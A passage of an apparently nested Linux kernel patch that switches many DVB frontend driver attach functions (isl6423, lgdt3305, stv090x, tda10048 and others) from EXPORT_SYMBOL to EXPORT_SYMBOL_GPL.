+ MODULE_DESCRIPTION("Driver for lnb supply and control ic isl6421");
+ MODULE_AUTHOR("Andrew de Quincey & Oliver Endriss");
+diff --git a/drivers/media/dvb-frontends/isl6423.c b/drivers/media/dvb-frontends/isl6423.c
+index 8cd1bb88ce6e7..a0d0a38340574 100644
+--- a/drivers/media/dvb-frontends/isl6423.c
++++ b/drivers/media/dvb-frontends/isl6423.c
+@@ -289,7 +289,7 @@ exit:
+ 	fe->sec_priv = NULL;
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(isl6423_attach);
++EXPORT_SYMBOL_GPL(isl6423_attach);
+ 
+ MODULE_DESCRIPTION("ISL6423 SEC");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/itd1000.c b/drivers/media/dvb-frontends/itd1000.c
+index 1b33478653d16..f8f362f50e78d 100644
+--- a/drivers/media/dvb-frontends/itd1000.c
++++ b/drivers/media/dvb-frontends/itd1000.c
+@@ -389,7 +389,7 @@ struct dvb_frontend *itd1000_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(itd1000_attach);
++EXPORT_SYMBOL_GPL(itd1000_attach);
+ 
+ MODULE_AUTHOR("Patrick Boettcher <pb@linuxtv.org>");
+ MODULE_DESCRIPTION("Integrant ITD1000 driver");
+diff --git a/drivers/media/dvb-frontends/ix2505v.c b/drivers/media/dvb-frontends/ix2505v.c
+index 73f27105c139d..3212e333d472b 100644
+--- a/drivers/media/dvb-frontends/ix2505v.c
++++ b/drivers/media/dvb-frontends/ix2505v.c
+@@ -302,7 +302,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(ix2505v_attach);
++EXPORT_SYMBOL_GPL(ix2505v_attach);
+ 
+ module_param_named(debug, ix2505v_debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/l64781.c b/drivers/media/dvb-frontends/l64781.c
+index c5106a1ea1cd0..fe5af2453d559 100644
+--- a/drivers/media/dvb-frontends/l64781.c
++++ b/drivers/media/dvb-frontends/l64781.c
+@@ -593,4 +593,4 @@ MODULE_DESCRIPTION("LSI L64781 DVB-T Demodulator driver");
+ MODULE_AUTHOR("Holger Waechtler, Marko Kohtala");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(l64781_attach);
++EXPORT_SYMBOL_GPL(l64781_attach);
+diff --git a/drivers/media/dvb-frontends/lg2160.c b/drivers/media/dvb-frontends/lg2160.c
+index f343066c297e2..fe700aa56bff3 100644
+--- a/drivers/media/dvb-frontends/lg2160.c
++++ b/drivers/media/dvb-frontends/lg2160.c
+@@ -1426,7 +1426,7 @@ struct dvb_frontend *lg2160_attach(const struct lg2160_config *config,
+ 
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(lg2160_attach);
++EXPORT_SYMBOL_GPL(lg2160_attach);
+ 
+ MODULE_DESCRIPTION("LG Electronics LG216x ATSC/MH Demodulator Driver");
+ MODULE_AUTHOR("Michael Krufky <mkrufky@linuxtv.org>");
+diff --git a/drivers/media/dvb-frontends/lgdt3305.c b/drivers/media/dvb-frontends/lgdt3305.c
+index 62d7439889196..60a97f1cc74e5 100644
+--- a/drivers/media/dvb-frontends/lgdt3305.c
++++ b/drivers/media/dvb-frontends/lgdt3305.c
+@@ -1148,7 +1148,7 @@ fail:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(lgdt3305_attach);
++EXPORT_SYMBOL_GPL(lgdt3305_attach);
+ 
+ static const struct dvb_frontend_ops lgdt3304_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/lgdt3306a.c b/drivers/media/dvb-frontends/lgdt3306a.c
+index 424311afb2bfa..6dfa8b18ed671 100644
+--- a/drivers/media/dvb-frontends/lgdt3306a.c
++++ b/drivers/media/dvb-frontends/lgdt3306a.c
+@@ -1859,7 +1859,7 @@ fail:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(lgdt3306a_attach);
++EXPORT_SYMBOL_GPL(lgdt3306a_attach);
+ 
+ #ifdef DBG_DUMP
+ 
+diff --git a/drivers/media/dvb-frontends/lgdt330x.c b/drivers/media/dvb-frontends/lgdt330x.c
+index ea9ae22fd2016..cb07869ea2fb3 100644
+--- a/drivers/media/dvb-frontends/lgdt330x.c
++++ b/drivers/media/dvb-frontends/lgdt330x.c
+@@ -928,7 +928,7 @@ struct dvb_frontend *lgdt330x_attach(const struct lgdt330x_config *_config,
+ 
+ 	return lgdt330x_get_dvb_frontend(client);
+ }
+-EXPORT_SYMBOL(lgdt330x_attach);
++EXPORT_SYMBOL_GPL(lgdt330x_attach);
+ 
+ static const struct dvb_frontend_ops lgdt3302_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/lgs8gxx.c b/drivers/media/dvb-frontends/lgs8gxx.c
+index 30014979b985b..ffaf60e16ecd4 100644
+--- a/drivers/media/dvb-frontends/lgs8gxx.c
++++ b/drivers/media/dvb-frontends/lgs8gxx.c
+@@ -1043,7 +1043,7 @@ error_out:
+ 	return NULL;
+ 
+ }
+-EXPORT_SYMBOL(lgs8gxx_attach);
++EXPORT_SYMBOL_GPL(lgs8gxx_attach);
+ 
+ MODULE_DESCRIPTION("Legend Silicon LGS8913/LGS8GXX DMB-TH demodulator driver");
+ MODULE_AUTHOR("David T. L. Wong <davidtlwong@gmail.com>");
+diff --git a/drivers/media/dvb-frontends/lnbh25.c b/drivers/media/dvb-frontends/lnbh25.c
+index 9ffe06cd787dd..41bec050642b5 100644
+--- a/drivers/media/dvb-frontends/lnbh25.c
++++ b/drivers/media/dvb-frontends/lnbh25.c
+@@ -173,7 +173,7 @@ struct dvb_frontend *lnbh25_attach(struct dvb_frontend *fe,
+ 		__func__, priv->i2c_address);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(lnbh25_attach);
++EXPORT_SYMBOL_GPL(lnbh25_attach);
+ 
+ MODULE_DESCRIPTION("ST LNBH25 driver");
+ MODULE_AUTHOR("info@netup.ru");
+diff --git a/drivers/media/dvb-frontends/lnbp21.c b/drivers/media/dvb-frontends/lnbp21.c
+index e564974162d65..32593b1f75a38 100644
+--- a/drivers/media/dvb-frontends/lnbp21.c
++++ b/drivers/media/dvb-frontends/lnbp21.c
+@@ -155,7 +155,7 @@ struct dvb_frontend *lnbh24_attach(struct dvb_frontend *fe,
+ 	return lnbx2x_attach(fe, i2c, override_set, override_clear,
+ 							i2c_addr, LNBH24_TTX);
+ }
+-EXPORT_SYMBOL(lnbh24_attach);
++EXPORT_SYMBOL_GPL(lnbh24_attach);
+ 
+ struct dvb_frontend *lnbp21_attach(struct dvb_frontend *fe,
+ 				struct i2c_adapter *i2c, u8 override_set,
+@@ -164,7 +164,7 @@ struct dvb_frontend *lnbp21_attach(struct dvb_frontend *fe,
+ 	return lnbx2x_attach(fe, i2c, override_set, override_clear,
+ 							0x08, LNBP21_ISEL);
+ }
+-EXPORT_SYMBOL(lnbp21_attach);
++EXPORT_SYMBOL_GPL(lnbp21_attach);
+ 
+ MODULE_DESCRIPTION("Driver for lnb supply and control ic lnbp21, lnbh24");
+ MODULE_AUTHOR("Oliver Endriss, Igor M. Liplianin");
+diff --git a/drivers/media/dvb-frontends/lnbp22.c b/drivers/media/dvb-frontends/lnbp22.c
+index b8c7145d4cefe..cb4ea5d3fad4a 100644
+--- a/drivers/media/dvb-frontends/lnbp22.c
++++ b/drivers/media/dvb-frontends/lnbp22.c
+@@ -125,7 +125,7 @@ struct dvb_frontend *lnbp22_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(lnbp22_attach);
++EXPORT_SYMBOL_GPL(lnbp22_attach);
+ 
+ MODULE_DESCRIPTION("Driver for lnb supply and control ic lnbp22");
+ MODULE_AUTHOR("Dominik Kuhlen");
+diff --git a/drivers/media/dvb-frontends/m88ds3103.c b/drivers/media/dvb-frontends/m88ds3103.c
+index 4e844b2ef5971..9a0d43c7ba9e0 100644
+--- a/drivers/media/dvb-frontends/m88ds3103.c
++++ b/drivers/media/dvb-frontends/m88ds3103.c
+@@ -1695,7 +1695,7 @@ struct dvb_frontend *m88ds3103_attach(const struct m88ds3103_config *cfg,
+ 	*tuner_i2c_adapter = pdata.get_i2c_adapter(client);
+ 	return pdata.get_dvb_frontend(client);
+ }
+-EXPORT_SYMBOL(m88ds3103_attach);
++EXPORT_SYMBOL_GPL(m88ds3103_attach);
+ 
+ static const struct dvb_frontend_ops m88ds3103_ops = {
+ 	.delsys = {SYS_DVBS, SYS_DVBS2},
+diff --git a/drivers/media/dvb-frontends/m88rs2000.c b/drivers/media/dvb-frontends/m88rs2000.c
+index b294ba87e934f..2aa98203cd659 100644
+--- a/drivers/media/dvb-frontends/m88rs2000.c
++++ b/drivers/media/dvb-frontends/m88rs2000.c
+@@ -808,7 +808,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(m88rs2000_attach);
++EXPORT_SYMBOL_GPL(m88rs2000_attach);
+ 
+ MODULE_DESCRIPTION("M88RS2000 DVB-S Demodulator driver");
+ MODULE_AUTHOR("Malcolm Priestley tvboxspy@gmail.com");
+diff --git a/drivers/media/dvb-frontends/mb86a16.c b/drivers/media/dvb-frontends/mb86a16.c
+index 2505f1e5794e7..ed08e0c2cf512 100644
+--- a/drivers/media/dvb-frontends/mb86a16.c
++++ b/drivers/media/dvb-frontends/mb86a16.c
+@@ -1848,6 +1848,6 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(mb86a16_attach);
++EXPORT_SYMBOL_GPL(mb86a16_attach);
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c
+index b74b9afed9a2e..9f5c61d4f23c5 100644
+--- a/drivers/media/dvb-frontends/mb86a20s.c
++++ b/drivers/media/dvb-frontends/mb86a20s.c
+@@ -2081,7 +2081,7 @@ struct dvb_frontend *mb86a20s_attach(const struct mb86a20s_config *config,
+ 	dev_info(&i2c->dev, "Detected a Fujitsu mb86a20s frontend\n");
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(mb86a20s_attach);
++EXPORT_SYMBOL_GPL(mb86a20s_attach);
+ 
+ static const struct dvb_frontend_ops mb86a20s_ops = {
+ 	.delsys = { SYS_ISDBT },
+diff --git a/drivers/media/dvb-frontends/mt312.c b/drivers/media/dvb-frontends/mt312.c
+index d43a67045dbe7..fb867dd8a26be 100644
+--- a/drivers/media/dvb-frontends/mt312.c
++++ b/drivers/media/dvb-frontends/mt312.c
+@@ -827,7 +827,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(mt312_attach);
++EXPORT_SYMBOL_GPL(mt312_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/mt352.c b/drivers/media/dvb-frontends/mt352.c
+index 399d5c519027e..1b2889f5cf67d 100644
+--- a/drivers/media/dvb-frontends/mt352.c
++++ b/drivers/media/dvb-frontends/mt352.c
+@@ -593,4 +593,4 @@ MODULE_DESCRIPTION("Zarlink MT352 DVB-T Demodulator driver");
+ MODULE_AUTHOR("Holger Waechtler, Daniel Mack, Antonio Mancuso");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(mt352_attach);
++EXPORT_SYMBOL_GPL(mt352_attach);
+diff --git a/drivers/media/dvb-frontends/nxt200x.c b/drivers/media/dvb-frontends/nxt200x.c
+index 200b6dbc75f81..1c549ada6ebf9 100644
+--- a/drivers/media/dvb-frontends/nxt200x.c
++++ b/drivers/media/dvb-frontends/nxt200x.c
+@@ -1216,5 +1216,5 @@ MODULE_DESCRIPTION("NXT200X (ATSC 8VSB & ITU-T J.83 AnnexB 64/256 QAM) Demodulat
+ MODULE_AUTHOR("Kirk Lapray, Michael Krufky, Jean-Francois Thibert, and Taylor Jacob");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(nxt200x_attach);
++EXPORT_SYMBOL_GPL(nxt200x_attach);
+ 
+diff --git a/drivers/media/dvb-frontends/nxt6000.c b/drivers/media/dvb-frontends/nxt6000.c
+index 136918f82dda0..e8d4940370ddf 100644
+--- a/drivers/media/dvb-frontends/nxt6000.c
++++ b/drivers/media/dvb-frontends/nxt6000.c
+@@ -621,4 +621,4 @@ MODULE_DESCRIPTION("NxtWave NXT6000 DVB-T demodulator driver");
+ MODULE_AUTHOR("Florian Schirmer");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(nxt6000_attach);
++EXPORT_SYMBOL_GPL(nxt6000_attach);
+diff --git a/drivers/media/dvb-frontends/or51132.c b/drivers/media/dvb-frontends/or51132.c
+index 24de1b1151583..144a1f25dec0a 100644
+--- a/drivers/media/dvb-frontends/or51132.c
++++ b/drivers/media/dvb-frontends/or51132.c
+@@ -605,4 +605,4 @@ MODULE_AUTHOR("Kirk Lapray");
+ MODULE_AUTHOR("Trent Piepho");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(or51132_attach);
++EXPORT_SYMBOL_GPL(or51132_attach);
+diff --git a/drivers/media/dvb-frontends/or51211.c b/drivers/media/dvb-frontends/or51211.c
+index ddcaea5c9941f..dc60482162c54 100644
+--- a/drivers/media/dvb-frontends/or51211.c
++++ b/drivers/media/dvb-frontends/or51211.c
+@@ -551,5 +551,5 @@ MODULE_DESCRIPTION("Oren OR51211 VSB [pcHDTV HD-2000] Demodulator Driver");
+ MODULE_AUTHOR("Kirk Lapray");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(or51211_attach);
++EXPORT_SYMBOL_GPL(or51211_attach);
+ 
+diff --git a/drivers/media/dvb-frontends/s5h1409.c b/drivers/media/dvb-frontends/s5h1409.c
+index 3089cc174a6f5..28b1dca077ead 100644
+--- a/drivers/media/dvb-frontends/s5h1409.c
++++ b/drivers/media/dvb-frontends/s5h1409.c
+@@ -981,7 +981,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(s5h1409_attach);
++EXPORT_SYMBOL_GPL(s5h1409_attach);
+ 
+ static const struct dvb_frontend_ops s5h1409_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/s5h1411.c b/drivers/media/dvb-frontends/s5h1411.c
+index 2563a72e98b70..fc48e659c2d8a 100644
+--- a/drivers/media/dvb-frontends/s5h1411.c
++++ b/drivers/media/dvb-frontends/s5h1411.c
+@@ -900,7 +900,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(s5h1411_attach);
++EXPORT_SYMBOL_GPL(s5h1411_attach);
+ 
+ static const struct dvb_frontend_ops s5h1411_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/s5h1420.c b/drivers/media/dvb-frontends/s5h1420.c
+index 6bdec2898bc81..d700de1ea6c24 100644
+--- a/drivers/media/dvb-frontends/s5h1420.c
++++ b/drivers/media/dvb-frontends/s5h1420.c
+@@ -918,7 +918,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(s5h1420_attach);
++EXPORT_SYMBOL_GPL(s5h1420_attach);
+ 
+ static const struct dvb_frontend_ops s5h1420_ops = {
+ 	.delsys = { SYS_DVBS },
+diff --git a/drivers/media/dvb-frontends/s5h1432.c b/drivers/media/dvb-frontends/s5h1432.c
+index 956e8ee4b388e..ff5d3bdf3bc67 100644
+--- a/drivers/media/dvb-frontends/s5h1432.c
++++ b/drivers/media/dvb-frontends/s5h1432.c
+@@ -355,7 +355,7 @@ struct dvb_frontend *s5h1432_attach(const struct s5h1432_config *config,
+ 
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(s5h1432_attach);
++EXPORT_SYMBOL_GPL(s5h1432_attach);
+ 
+ static const struct dvb_frontend_ops s5h1432_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/s921.c b/drivers/media/dvb-frontends/s921.c
+index f118d8e641030..7e461ac159fc1 100644
+--- a/drivers/media/dvb-frontends/s921.c
++++ b/drivers/media/dvb-frontends/s921.c
+@@ -495,7 +495,7 @@ struct dvb_frontend *s921_attach(const struct s921_config *config,
+ 
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(s921_attach);
++EXPORT_SYMBOL_GPL(s921_attach);
+ 
+ static const struct dvb_frontend_ops s921_ops = {
+ 	.delsys = { SYS_ISDBT },
+diff --git a/drivers/media/dvb-frontends/si21xx.c b/drivers/media/dvb-frontends/si21xx.c
+index 2d29d2c4d434c..210ccd356e2bf 100644
+--- a/drivers/media/dvb-frontends/si21xx.c
++++ b/drivers/media/dvb-frontends/si21xx.c
+@@ -937,7 +937,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(si21xx_attach);
++EXPORT_SYMBOL_GPL(si21xx_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/sp887x.c b/drivers/media/dvb-frontends/sp887x.c
+index 146e7f2dd3c5e..f59c0f96416b5 100644
+--- a/drivers/media/dvb-frontends/sp887x.c
++++ b/drivers/media/dvb-frontends/sp887x.c
+@@ -624,4 +624,4 @@ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+ MODULE_DESCRIPTION("Spase sp887x DVB-T demodulator driver");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(sp887x_attach);
++EXPORT_SYMBOL_GPL(sp887x_attach);
+diff --git a/drivers/media/dvb-frontends/stb0899_drv.c b/drivers/media/dvb-frontends/stb0899_drv.c
+index 4ee6c1e1e9f7d..2f4d8fb400cd6 100644
+--- a/drivers/media/dvb-frontends/stb0899_drv.c
++++ b/drivers/media/dvb-frontends/stb0899_drv.c
+@@ -1638,7 +1638,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stb0899_attach);
++EXPORT_SYMBOL_GPL(stb0899_attach);
+ MODULE_PARM_DESC(verbose, "Set Verbosity level");
+ MODULE_AUTHOR("Manu Abraham");
+ MODULE_DESCRIPTION("STB0899 Multi-Std frontend");
+diff --git a/drivers/media/dvb-frontends/stb6000.c b/drivers/media/dvb-frontends/stb6000.c
+index 8c9800d577e03..d74e34677b925 100644
+--- a/drivers/media/dvb-frontends/stb6000.c
++++ b/drivers/media/dvb-frontends/stb6000.c
+@@ -232,7 +232,7 @@ struct dvb_frontend *stb6000_attach(struct dvb_frontend *fe, int addr,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(stb6000_attach);
++EXPORT_SYMBOL_GPL(stb6000_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/stb6100.c b/drivers/media/dvb-frontends/stb6100.c
+index 698866c4f15a7..c5818a15a0d70 100644
+--- a/drivers/media/dvb-frontends/stb6100.c
++++ b/drivers/media/dvb-frontends/stb6100.c
+@@ -557,7 +557,7 @@ static void stb6100_release(struct dvb_frontend *fe)
+ 	kfree(state);
+ }
+ 
+-EXPORT_SYMBOL(stb6100_attach);
++EXPORT_SYMBOL_GPL(stb6100_attach);
+ MODULE_PARM_DESC(verbose, "Set Verbosity level");
+ 
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/stv0288.c b/drivers/media/dvb-frontends/stv0288.c
+index 3ae1f3a2f1420..a5581bd60f9e8 100644
+--- a/drivers/media/dvb-frontends/stv0288.c
++++ b/drivers/media/dvb-frontends/stv0288.c
+@@ -590,7 +590,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0288_attach);
++EXPORT_SYMBOL_GPL(stv0288_attach);
+ 
+ module_param(debug_legacy_dish_switch, int, 0444);
+ MODULE_PARM_DESC(debug_legacy_dish_switch,
+diff --git a/drivers/media/dvb-frontends/stv0297.c b/drivers/media/dvb-frontends/stv0297.c
+index 6d5962d5697ac..9d4dbd99a5a79 100644
+--- a/drivers/media/dvb-frontends/stv0297.c
++++ b/drivers/media/dvb-frontends/stv0297.c
+@@ -710,4 +710,4 @@ MODULE_DESCRIPTION("ST STV0297 DVB-C Demodulator driver");
+ MODULE_AUTHOR("Dennis Noermann and Andrew de Quincey");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(stv0297_attach);
++EXPORT_SYMBOL_GPL(stv0297_attach);
+diff --git a/drivers/media/dvb-frontends/stv0299.c b/drivers/media/dvb-frontends/stv0299.c
+index b5263a0ee5aa5..da7ff2c2e8e55 100644
+--- a/drivers/media/dvb-frontends/stv0299.c
++++ b/drivers/media/dvb-frontends/stv0299.c
+@@ -752,4 +752,4 @@ MODULE_DESCRIPTION("ST STV0299 DVB Demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler, Peter Schildmann, Felix Domke, Andreas Oberritter, Andrew de Quincey, Kenneth Aafly");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(stv0299_attach);
++EXPORT_SYMBOL_GPL(stv0299_attach);
+diff --git a/drivers/media/dvb-frontends/stv0367.c b/drivers/media/dvb-frontends/stv0367.c
+index 95e376f23506f..04556b77c16c9 100644
+--- a/drivers/media/dvb-frontends/stv0367.c
++++ b/drivers/media/dvb-frontends/stv0367.c
+@@ -1750,7 +1750,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0367ter_attach);
++EXPORT_SYMBOL_GPL(stv0367ter_attach);
+ 
+ static int stv0367cab_gate_ctrl(struct dvb_frontend *fe, int enable)
+ {
+@@ -2919,7 +2919,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0367cab_attach);
++EXPORT_SYMBOL_GPL(stv0367cab_attach);
+ 
+ /*
+  * Functions for operation on Digital Devices hardware
+@@ -3340,7 +3340,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0367ddb_attach);
++EXPORT_SYMBOL_GPL(stv0367ddb_attach);
+ 
+ MODULE_PARM_DESC(debug, "Set debug");
+ MODULE_PARM_DESC(i2c_debug, "Set i2c debug");
+diff --git a/drivers/media/dvb-frontends/stv0900_core.c b/drivers/media/dvb-frontends/stv0900_core.c
+index 212312d20ff62..e7b9b9b11d7df 100644
+--- a/drivers/media/dvb-frontends/stv0900_core.c
++++ b/drivers/media/dvb-frontends/stv0900_core.c
+@@ -1957,7 +1957,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0900_attach);
++EXPORT_SYMBOL_GPL(stv0900_attach);
+ 
+ MODULE_PARM_DESC(debug, "Set debug");
+ 
+diff --git a/drivers/media/dvb-frontends/stv090x.c b/drivers/media/dvb-frontends/stv090x.c
+index 0a600c1d7d1b1..aba64162dac45 100644
+--- a/drivers/media/dvb-frontends/stv090x.c
++++ b/drivers/media/dvb-frontends/stv090x.c
+@@ -5072,7 +5072,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv090x_attach);
++EXPORT_SYMBOL_GPL(stv090x_attach);
+ 
+ static const struct i2c_device_id stv090x_id_table[] = {
+ 	{"stv090x", 0},
+diff --git a/drivers/media/dvb-frontends/stv6110.c b/drivers/media/dvb-frontends/stv6110.c
+index 963f6a896102a..1cf9c095dbff0 100644
+--- a/drivers/media/dvb-frontends/stv6110.c
++++ b/drivers/media/dvb-frontends/stv6110.c
+@@ -427,7 +427,7 @@ struct dvb_frontend *stv6110_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(stv6110_attach);
++EXPORT_SYMBOL_GPL(stv6110_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/stv6110x.c b/drivers/media/dvb-frontends/stv6110x.c
+index fbc4dbd62151d..6ab2001215917 100644
+--- a/drivers/media/dvb-frontends/stv6110x.c
++++ b/drivers/media/dvb-frontends/stv6110x.c
+@@ -468,7 +468,7 @@ const struct stv6110x_devctl *stv6110x_attach(struct dvb_frontend *fe,
+ 	dev_info(&stv6110x->i2c->dev, "Attaching STV6110x\n");
+ 	return stv6110x->devctl;
+ }
+-EXPORT_SYMBOL(stv6110x_attach);
++EXPORT_SYMBOL_GPL(stv6110x_attach);
+ 
+ static const struct i2c_device_id stv6110x_id_table[] = {
+ 	{"stv6110x", 0},
+diff --git a/drivers/media/dvb-frontends/tda10021.c b/drivers/media/dvb-frontends/tda10021.c
+index faa6e54b33729..462e12ab6bd14 100644
+--- a/drivers/media/dvb-frontends/tda10021.c
++++ b/drivers/media/dvb-frontends/tda10021.c
+@@ -523,4 +523,4 @@ MODULE_DESCRIPTION("Philips TDA10021 DVB-C demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler, Markus Schulz");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10021_attach);
++EXPORT_SYMBOL_GPL(tda10021_attach);
+diff --git a/drivers/media/dvb-frontends/tda10023.c b/drivers/media/dvb-frontends/tda10023.c
+index 8f32edf6b700e..4c2541ecd7433 100644
+--- a/drivers/media/dvb-frontends/tda10023.c
++++ b/drivers/media/dvb-frontends/tda10023.c
+@@ -594,4 +594,4 @@ MODULE_DESCRIPTION("Philips TDA10023 DVB-C demodulator driver");
+ MODULE_AUTHOR("Georg Acher, Hartmut Birr");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10023_attach);
++EXPORT_SYMBOL_GPL(tda10023_attach);
+diff --git a/drivers/media/dvb-frontends/tda10048.c b/drivers/media/dvb-frontends/tda10048.c
+index 0b3f6999515e3..f6d8a64762b99 100644
+--- a/drivers/media/dvb-frontends/tda10048.c
++++ b/drivers/media/dvb-frontends/tda10048.c
+@@ -1138,7 +1138,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(tda10048_attach);
++EXPORT_SYMBOL_GPL(tda10048_attach);
+ 
+ static const struct dvb_frontend_ops tda10048_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/tda1004x.c b/drivers/media/dvb-frontends/tda1004x.c
+index 83a798ca9b002..6f306db6c615f 100644
+--- a/drivers/media/dvb-frontends/tda1004x.c
++++ b/drivers/media/dvb-frontends/tda1004x.c
+@@ -1378,5 +1378,5 @@ MODULE_DESCRIPTION("Philips TDA10045H & TDA10046H DVB-T Demodulator");
+ MODULE_AUTHOR("Andrew de Quincey & Robert Schlabbach");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10045_attach);
+-EXPORT_SYMBOL(tda10046_attach);
++EXPORT_SYMBOL_GPL(tda10045_attach);
++EXPORT_SYMBOL_GPL(tda10046_attach);
+diff --git a/drivers/media/dvb-frontends/tda10086.c b/drivers/media/dvb-frontends/tda10086.c
+index cdcf97664bba8..b449514ae5854 100644
+--- a/drivers/media/dvb-frontends/tda10086.c
++++ b/drivers/media/dvb-frontends/tda10086.c
+@@ -764,4 +764,4 @@ MODULE_DESCRIPTION("Philips TDA10086 DVB-S Demodulator");
+ MODULE_AUTHOR("Andrew de Quincey");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10086_attach);
++EXPORT_SYMBOL_GPL(tda10086_attach);
+diff --git a/drivers/media/dvb-frontends/tda665x.c b/drivers/media/dvb-frontends/tda665x.c
+index 13e8969da7f89..346be5011fb73 100644
+--- a/drivers/media/dvb-frontends/tda665x.c
++++ b/drivers/media/dvb-frontends/tda665x.c
+@@ -227,7 +227,7 @@ struct dvb_frontend *tda665x_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(tda665x_attach);
++EXPORT_SYMBOL_GPL(tda665x_attach);
+ 
+ MODULE_DESCRIPTION("TDA665x driver");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/tda8083.c b/drivers/media/dvb-frontends/tda8083.c
+index e3e1c3db2c856..44f53624557bc 100644
+--- a/drivers/media/dvb-frontends/tda8083.c
++++ b/drivers/media/dvb-frontends/tda8083.c
+@@ -481,4 +481,4 @@ MODULE_DESCRIPTION("Philips TDA8083 DVB-S Demodulator");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda8083_attach);
++EXPORT_SYMBOL_GPL(tda8083_attach);
+diff --git a/drivers/media/dvb-frontends/tda8261.c b/drivers/media/dvb-frontends/tda8261.c
+index 0d576d41c67d8..8b06f92745dca 100644
+--- a/drivers/media/dvb-frontends/tda8261.c
++++ b/drivers/media/dvb-frontends/tda8261.c
+@@ -188,7 +188,7 @@ exit:
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(tda8261_attach);
